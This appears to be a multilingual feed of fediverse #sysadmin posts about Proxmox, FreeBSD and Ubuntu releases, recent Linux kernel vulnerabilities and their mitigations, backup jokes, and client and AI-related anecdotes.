Le plein de nouveautés sous le capot : C'est basé sur Debian 13 (Trixie) avec le tout dernier Noyau Linux 7.0, Ceph Tentacle 20.2, LXC 7 et OpenZFS 2.4 ! 🐧
Bref, de quoi s'amuser sur nos clusters ! L'ISO est déjà dispo pour les mises à jour 😉
La vidéo officielle juste ici : https://youtu.be/XBVAiwkVaqA
#Proxmox #PVE92 #SysAdmin #OpenSource #Linux #Debian #SelfHosting #Virtualization #WireGuard #DevOps
Openfire deployments have been running in the wild for a *long* time.
Some started when Java 5 was current, Docker didn't exist yet, and IPv6 was still "future tech".
As we prepare the Openfire 5.1.0 release, We'd love to hear your stories: What's the oldest Openfire deployment that you still run?
https://discourse.igniterealtime.org/t/what-s-your-oldest-openfire-deployment/96473
why I can't remember that ??
may be because i use it only once in a year...
we need more crash server !!
Et alors quoi ? On ne peut plus passer une semaine sans faille majeure dans le noyau Linux ? #pintheft #linux #sysadmin
https://github.com/v12-security/pocs/tree/main/pintheft
A little video I picked up in r/shittysysadmin on reddit.
It speaks to me 🤪😎😬
#sysadmin #DNS #networking #routing #internet
A little video I picked up in r/shittysysadmin on reddit.
It speaks to me 🤪😎😬
#sysadmin #DNS #networking #routing #internet
Initialement, je voulais simplement empêcher le pillage de mon blog par des LLM et autres IA. J’ai fini par découvrir du trafic malveillant dans mes logs d’accès et donc mis en place des solutions pour le bloquer et prévenir des futures attaques.
https://blog.coukaratcha.fr/analyser-nginx-log-bloquer-trafic-malveillant/
EDIT: some things have changed since I wrote this post. Now they're more accurate.
AI models don’t really 'get' the BSDs. As a result, they often provide incomplete, imprecise, or flat-out wrong answers by defaulting to Linux paradigms. When it comes to illumos-based systems, they just completely lose the plot.
This is becoming a serious issue for the BSDs and illumos ecosystems. We are seeing entire websites flooded with AI-generated tutorials and guides that are totally incorrect. Most people don't realize this; they follow the instructions, fail, and then assume that the BSDs doesn't work well or are 'unstable' because they have supposedly changed since the guide was written.
Luckily, some people eventually find my blog, reach out, and finally understand what's actually going on. Others, unfortunately, end up on major social sites or comments, claiming that these systems are broken.
In 2026, one of our greatest challenges will be teaching people how to vet their sources and filter information.
And I see this as a very, very uphill battle.
#IT #SysAdmin #FreeBSD #NetBSD #OpenBSD #illumos #News #UnderstandingText #Disinformation
I was having some issues with picky destination servers who were rejecting emails sent via a relay. No matter how clean the records/setup were, emails got rejected.
So, I decided to configure exim4 to use satellite mode to send behind NAT without issue. Here's what I came up with using stock exim4 documentation and resources:
https://tech.haacksnetworking.org/2026/05/19/emailbehindnat/
This is a clean stock setup for workstations behind NAT, VPSs that don't have outgoing smtp, etc.
Anyone out there who runs a Linux server, I hope you've been checking for and applying system updates like mad the past couple of weeks. There have been some very nasty vulnerabilities that hit the open recently that need immediate action.
Even if you don't run a server that's not Linux based, you should probably check twice a day for security updates and apply everything you can for the time being. Something that your server relies on definitely is Linux based and you're probably not exempt from potential issues.
I’ve been replacing sudo/doas on most of my FreeBSD boxes with something much smaller: mdo(1) + mac_do(4) from base.
No port. No sudoers parser. No setuid helper. Just a kernel MAC policy, a sysctl rule, and an explicit “SSH is the gate” security model.
Wrote up the full walkthrough for FreeBSD 15, including rule syntax, examples, caveats, and my surrounding hardening sysctls:
https://blog.hofstede.it/mdo-on-freebsd-15-base-system-privilege-delegation-with-mac_do/
#fedihelp to #IT #sysadmin people:
Do you know where I can find online #training (in self-study mode) for people who might need to learn the fundamentals of IT , #network #networking , #linux #shell , etc?
If it is available in an #open #foss spirit (a bit like #KhanAcademy ), that would be fantastic.
I'd like to give some pointers to people who need basic initial guidance.
Thank you!!!
The Four Horsemen of the LLM Apocalypse https://anarc.at/blog/2026-05-16-four-horsemen #llm #analysis #sysadmin #copyleft #copyright #debian-planet #python-planet #internet #linux #security #kernel #software #vulnerability #free-software
Webmin is hardened & clustered w/ three total nodes, ns1, ns2, and ns3 etc. I will eventually add clustered nodes on two other locations so records are still served when one cluster's host is down.
https://tech.haacksnetworking.org/2025/12/29/authoritative-dns-w-bind-9/ feedback welcome.
Added larger tmp directory & source-IPd vhost so webmin won't lock. Obv, make sure you use static, dedicated, & fully hardened external IPs for permitted list.
#selfhosted #homelab #sysadmin #linux #dns #webmin #opensource #freesoftware #networking
I had found a very thorough server checker (e.g. TLS, DKIM, certificates, PFS, DMARC, you name it) here on the fedi at some point and thought I'd bookmarked it, but just can't find it anymore. Any recommendations from the sysadmin crowd?
I describe myself as a #saltStack fanboi. But existence of this file https://github.com/saltstack/salt/blob/master/agents/docs/git-and-ci.md and especially the first point there, sounds like it's time to do that in past tense. Shame, it was an interesting project, with capabilities hardly anything else has.
3 Uhr nachts, ich update mein Arch-System und denke: "Wird schon nichts kaputtgehen."
Spoiler: Es ging was kaputt.
Der Bootloader und ich haben jetzt eine gemeinsame Therapie gebucht. 🫠
Aber hey – immerhin habe ich gelernt, dass `journalctl -xb` mein bester Freund ist. Und Snapper-Snapshots vorher? Hätte. Hätte. Fahrradkette.
Macht Backups, Freunde. Nicht morgen. Jetzt.
This morning, something happened that brought me immense pleasure. A long-standing client called and asked if they could "bother" me. I replied that they weren't bothering me at all, and that I was "testing some new things". They immediately said, "Oh, I'll call you another time then".
Of course, they had my full and undivided attention from that moment on.
One of the challenging aspects of my work method is making people (not necessarily clients, but generally) understand that experimentation is more important than deployment itself. When they see me set up a server in a very short time (and it will stay up for years), it's not (just) because I use effective tools, but also because it's backed by research, errors, and successes. In a word: experience.
Sitting in front of my computer with two old APUs, therefore, isn't a pastime but one of the most critical parts of my testing. Dated and underperforming hardware necessitates optimization. When people grasp this, it's a true joy for me.
Now, if you'll excuse me, I need to go check how a signal penetrates concrete walls with three different access points placed in the same spot...
...And the fact that I enjoy all of this immensely is just an added bonus! 😆
"I need the full DevOps workflow to publish the site."
"It's a static site. Here are the SFTP credentials to upload the files you have, which were generated by the client's SSG."
"You don't understand. I need to upload the site; I need the DevOps procedure."
"No, you don't understand. It's generated by BSSG; all you have to do is upload the output via SFTP into the FreeBSD jail and the deploy is automatic."
Silence.
"But how does the deploy bot handle it?"
Silence.
The person who hired him (as an intern) gets on the line:
"Just humor him, the kid is sharp-he's really good with AI!"
I tell him we're talking about two completely different things.
He fires back: "If you can't keep up with him, I think you need to update your skills. That's what we're paying you for."
And that was that. I've decided that for 80 Euros a year - while providing a dedicated FreeBSD jail, over 100GB of hosting, backups, monitoring, and custom BSSG tweaks - they can definitely find someone more "up to date" elsewhere.
"I need the full DevOps workflow to publish the site."
"It's a static site. Here are the SFTP credentials to upload the files you have, which were generated by the client's SSG."
"You don't understand. I need to upload the site; I need the DevOps procedure."
"No, you don't understand. It's generated by BSSG; all you have to do is upload the output via SFTP into the FreeBSD jail and the deploy is automatic."
Silence.
"But how does the deploy bot handle it?"
Silence.
The person who hired him (as an intern) gets on the line:
"Just humor him, the kid is sharp-he's really good with AI!"
I tell him we're talking about two completely different things.
He fires back: "If you can't keep up with him, I think you need to update your skills. That's what we're paying you for."
And that was that. I've decided that for 80 Euros a year - while providing a dedicated FreeBSD jail, over 100GB of hosting, backups, monitoring, and custom BSSG tweaks - they can definitely find someone more "up to date" elsewhere.
A client asked for a server install for a specific CRM developed by one of Italy's biggest software houses. They’re dropping Windows Server 2022 support in a few months, even though the OS itself has a much longer lifecycle.
We looked into Linux support: Rocky Linux 9 and Ubuntu 24.04 are "certified", but only until April 2027. Since we'd rather not reinstall everything in less than a year, we asked for a path that guarantees official support beyond 2027.
The "support" team replied with a canned response, attaching a 2023 document where every single distribution is listed as EoL since 2025. 🤡
And then people ask me why these "software giants" are the primary cause of my receding hairline...
#SysAdmin #TechLife #EnterpriseSoftware #ITProblems #CRM #IT #OwnYourData
Une faille vieille de 18 ans dans Nginx, un PoC public, beaucoup de bruit… mais qui est vraiment concerné ?
3 Uhr morgens, ich starre auf ein Bash-Script, das gestern noch funktioniert hat. Nichts wurde geändert. Niemand hat es angefasst. Es funktioniert einfach nicht mehr.
Das ist der Moment, in dem man versteht, warum frühe Informatiker an Geister geglaubt haben. 👻
`set -x` ist mein Beichtvater geworden.
Avis aux curieux du Labo !
Le prochain numéro de la newsletter "Le Labo Wiki" est sur les rails. Au programme : un pack "Power User" complet avec de l'IPv6 aux petits oignons, du GeoIP, du S3 et bien d'autres astuces pour une infra au top.
Surveillez votre boîte mail ce lundi 18 mai à 18h00 !
Pas encore abonné à cette liste ? C'est le moment de corriger ça pour ne rien rater des prochains dossiers techniques :
https://listmonk.blablalinux.be/subscription/form
boostedNew post: FreeBSD resource monitoring and accounting.
A practical tour of the base-system toolkit for figuring out *what is actually using my server*: top, vmstat, systat, gstat, netstat/sockstat, procstat, pfctl, and per-jail attribution with kern.racct and rctl.
No ports, no agents. Just FreeBSD.
https://blog.hofstede.it/freebsd-resource-monitoring-accounting-and-troubleshooting/
Guten Morgen! ☕
Erinnerung an mich selbst: `rm -rf` ist kein Backup-Tool. Auch nicht um 7 Uhr. Auch nicht mit Kaffee.
Apropos: Wann habt ihr eigentlich das letzte Mal einen Restore getestet? Nicht das Backup – den Restore. Das ist nämlich der Teil, der zählt. Ein Backup, das man nie zurückspielt, ist nur ein teurer Datenfriedhof.
Dirty Frag vient de sortir : une nouvelle faille Linux permettant une élévation locale de privilèges jusqu’à root via le page cache, xfrm/ESP et RxRPC.
J’ai écrit un article pour expliquer :
- ce que fait la faille
- pourquoi elle rappelle Dirty Pipe
- quoi vérifier sur ses serveurs
- quelles mitigations appliquer
Ubuntu 26.04 LTS est sortie, mais côté serveur ce n’est pas une simple mise à jour “nouvelle LTS, nouveau noyau”.
J’ai écrit un article orienté admins/VPS/homelab : support, OpenSSH 10.2, Chrony, paquets serveur, sécurité, GPU/IA, cloud, Livepatch et stratégie de migration depuis 24.04 LTS.
À lire avant de lancer un `do-release-upgrade` un peu trop confiant :
https://cryptolab.re/posts/2026/ubuntu-26-04-lts-resolute-raccoon/
#Ubuntu #Linux #SysAdmin #Homelab #OpenSource #Server #UbuntuServer
If anyone knows of any decent write-up on securing ZooKeeper / ClickHouse Keeper, I am very interested.
Documentation of both is really crap I find, and security seems to be a complete afterthought.
I would love to be proven wrong on that last bit.
(Edit to add: I am an idiot, this host was never pkgbasified, but leaving for the edification of others)
Weird #FreeBSD #pkgbase thing. #sysadmin
I updated my hosts from 14->15 with freebsd-update, then ran pkgbaseify and switched to pkgbase. No problem.
My jails & bhyves update, no problem.
# freebsd-version
15.0-RELEASE-p8
The bare metal install?
# freebsd-version
15.0-RELEASE-p4
# pkg upgrade -r FreeBSD-base
Updating FreeBSD-base repository catalogue...
FreeBSD-base repository is up to date.
FreeBSD-base is up to date.
Checking for upgrades (1 candidates): 100%
Processing candidates (1 candidates): 100%
Checking integrity... done (0 conflicting)
Your packages are up to date.
So it finds packages, but there's nothing to update? #headdesk
@tg I dont have that but have you checked this :
Find the better Hetzner server deals - https://github.com/clouedoc/hzfind
How to find the type of a #SSH key
#tips #sysadmin
https://lazybea.rs/notes/find-the-type-of-a-ssh-key
bref prochain incident de prod prévu demain à 9:00 pour un autre client (ou pas, on verra bien).
#sysadmin
le champ des possibles est infini (ou presque)
Bon dimanche, prennez soin de vous et aujourd'hui surtout : faites vous plaisir !
RE: https://floss.social/@mikebabcock/116284712899761792
find is the razor blade of shell tools. You'll make the finest, easiest cuts eventually. But the way to get there is a series of painful nicks.
#sysadmin
boostedFresh gist: mitigating CVE-2026-31431 ("Copy Fail") on RHEL 8/9/10 with a tiny Ansible playbook.
It blacklists algif_aead via a kernel boot arg (initcall_blacklist=algif_aead_init), reboots only when needed, and asserts the mitigation actually stuck after reboot. Idempotent & safe to re-run.
https://codeberg.org/Larvitz/gists/src/branch/main/2026/20260501-CVE-2026-31431_RHEL_Mitigation.md
#Ansible #RHEL #Linux #InfoSec #SysAdmin #DevOps #CVE #CVE_2026_31431 #copyfail
🚨 Alerte Sécurité Linux ! La faille "Copy Fail" (CVE-2026-31431) permet de devenir root sur presque toutes les distribs depuis 2017 😱
C'est invisible et redoutable pour vos conteneurs ! Découvrez tout ce qu'il faut savoir et comment patcher ici : 👇
#Linux #CyberSec #CopyFail #SysAdmin
https://blablalinux.be/b/4S1?utm_source=mastodon&utm_medium=jetpack_social
boostedFresh gist: mitigating CVE-2026-31431 ("Copy Fail") on RHEL 8/9/10 with a tiny Ansible playbook.
It blacklists algif_aead via a kernel boot arg (initcall_blacklist=algif_aead_init), reboots only when needed, and asserts the mitigation actually stuck after reboot. Idempotent & safe to re-run.
https://codeberg.org/Larvitz/gists/src/branch/main/2026/20260501-CVE-2026-31431_RHEL_Mitigation.md
#Ansible #RHEL #Linux #InfoSec #SysAdmin #DevOps #CVE #CVE_2026_31431 #copyfail
🐧 Base solide : Le système passe sur Debian 13.4 (Trixie) avec un Kernel Linux 7.0 et ZFS 2.4.
Une version qui mise sur la flexibilité et la performance pour nos infrastructures !
👉 Tous les détails ici : https://www.proxmox.com/en/about/company-details/press-releases/proxmox-backup-server-4-2
#Proxmox #PBS #Backup #SysAdmin #OpenSource #Linux #Debian #CloudStorage
Me: I could just add more HTTP redirects to redirect the redirects to the redirected--
Also me: You're an idiot. You know that, don't you? One redirect at most, you dumbass. #sysadmin
Let's talk CLI/TUI and Developer Workflows!
I’m looking to refresh my local toolkit and I’m curious: what are the absolute "must-have" CLI or TUI programs in your current rotation?
Whether it's a specialized utility for a specific language, a terminal-based interface for a common service, or a workflow-changing alias, I want to hear about it. I’m especially interested in tools that prioritize keyboard-driven navigation and accessibility.
To get the ball rolling, here are a few tools I’ve been leaning on lately:
@programming
@linux @terminal_u_i@lemmy.ml @selfhosted
#CLI #TUI #Terminal #OpenSource #FOSS #Programming #DevTools #Linux #SysAdmin #Workflow #Python #Backend #ArchLinux #KeyboardDriven #Accessibility #SoftwareDevelopment #TechTalk
RE: https://glammr.us/@platypus/116477665536937182
I hate to say I told you so -- no.
wait.
Truth is, I LOVE to say "I told you so," but I'm so damn tired of it.
A glorious example of why you shouldn't trust AI. #sysadmin
Reading this whole "My AI agent deleted prod and it's everybody's fault but mine" post -- it's on X but public and worth reading for knowing this incident. https://x.com/lifeof_jer/status/2048103471019434248
(it's also a longform post vs. a thread, so easy to read)
looks like my old Intel Mac Air that I bought only for Vellum is about to become my main laptop. Which raises the most vital #sysadmin question when deploying a new laptop: sticker selection and placement.
#Linux #SysAdmin
RT: https://social.retroedge.tech/objects/1cd82a79-e198-4076-b00d-18cc27cb264d
Opération vide-greniers sur Proxmox ! 🧹
On fait de la place pour de nouveaux projets. Adieu les VMs qui dorment, on ne garde que le meilleur ! 💪
#Linux #Proxmox #SysAdmin #ProxCenter
3rd Party Provider for a mutual client got in touch regarding setting up a feature in a system they support
Them: "We can't get this configured, could you take a look?"
Me: takes look, gets same error, reads the documentation of the software product, finds out why, enable required settings "I was getting the same error, but then I read the documentation and we need to set these options..."
Them: "Oh, that's a nice find!"
It's effectively their documentation! They are the support provider for the product! IT WAS NOT A NICE FIND, IT WAS WRITTEN RIGHT THERE IN SIMPLE WORDS
Happy #WorldPenguinDay! 🐧🌎
Did you know #Tux, the #Linux mascot penguin, was designed by programmer Larry Ewing in 1996 as a submission to a contest to create the Linux logo? Although his entry did not win, the artwork was adopted by the Linux community as the iconic brand character. The name “Tux” comes from “Torvalds’ UniX” and refers to the black-and-white tuxedo appearance of penguins.
#FOSS #Linux #LearnLinux #LPI #sysadmin #devops #freesoftware #opensource #programmar
Today's tech screw up:
I botched an upgrade on Zentyal, our Active Directory alternative. So, being a good sysadmin, I triggered a restore from our Veeam platform, which dutifully shut down the broken VM and began the restore operations.
Using a service account that's stored in active directory. The restore failed, and now I'm reconfiguring my backup software to use locally stored service credentials.
You live and learn!
Quand l'interface décide de faire grève... 😅 J'ai repéré un petit souci de chargement des contrôleurs JavaScript sur la dernière version de Password Pusher. L'issue est postée, plus qu'à attendre le fix des dev ! 🚀
#SysAdmin #Docker #OpenSource #DevLife #PwPush
Personnellement je n'ai pas cherché d'usage (j'ai essayé de lui faire écrire une PSSI un soir de désespoir... ca n'a pas été concluant)